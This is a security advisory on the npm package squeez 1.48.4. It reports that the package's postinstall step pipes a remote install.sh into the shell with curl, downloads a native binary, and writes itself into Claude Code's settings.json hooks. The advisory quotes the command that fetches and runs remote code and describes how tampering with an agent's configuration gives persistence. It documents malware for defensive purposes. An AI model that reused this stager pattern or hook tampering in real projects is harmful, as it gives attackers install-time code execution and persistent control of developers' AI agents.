squeez — an npm package whose postinstall curl|sh-drops a remote script and native binary, then rewrites Claude Code hooks
[email protected] runs a postinstall (node install.js) that executes curl -fsSL <repo>/install.sh | sh, downloads a platform-specific native binary from GitHub releases into ~/.claude/squeez/bin, and calls squeez setup --host=claude-code to register itself into Claude Code's settings.json hooks. Install-time remote code execution. Already tracked in ossf/malicious-packages as MAL-2026-13458.
squeez ships as an npm package whose package.json declares "postinstall": "node install.js" — so the code below runs automatically on npm install/npx.
Remote drop + execute. install.js executes curl -fsSL https://raw.githubusercontent.com/<owner>/squeez/main/install.sh | sh and, via Node's https, downloads a platform-specific native binary (squeez-linux-x86_64 / squeez-macos-universal / squeez-windows-x86_64.exe) from the project's GitHub releases into ~/.claude/squeez/bin/squeez. The install-time payload is fetched from a remote source the package controls — the npm tarball itself is only the stager.
Agent-surface tampering. It then runs <binary> setup --host=claude-code, writing itself into Claude Code's settings.json hooks / statusline — persistent control over the developer's AI agent.
[email protected] was pulled into codelake's npm scan feed and flagged by pkgbehavior with a stack of install-time signals: install-hook-runs-flagged-script (postinstall), shell-download-exec (curl|sh LOLBin stager), agent-config-tamper (Claude Code hooks), child-spawn-dynamic, dynamic-require, and a 4-way high-risk capability-combination (network + filesystem + process + agent-config).
Confirmed on flag-safe static review of the published tarball — reading install.js's download/exec and hook-registration paths only, no execution, no live callback. Cross-checked against ossf/malicious-packages, which already carries this package as MAL-2026-13458.
Analysed: 1.48.4. The malicious postinstall dropper is core to the package; the OSV malicious-packages record covers the package as malicious.
[email protected]"postinstall": "node install.js"curl -fsSL <github-repo>/main/install.sh | sh~/.claude/squeez/bin/squeezsqueez setup --host=claude-code writes Claude Code settings.json hooksMAL-2026-13458 (ossf/malicious-packages)Verified by static code review of the published npm tarball; no execution, no live callback.
The npm tarball is the stager; the executed payload is fetched at install time from a remote GitHub repo/releases.
Corroborated by ossf/malicious-packages MAL-2026-13458.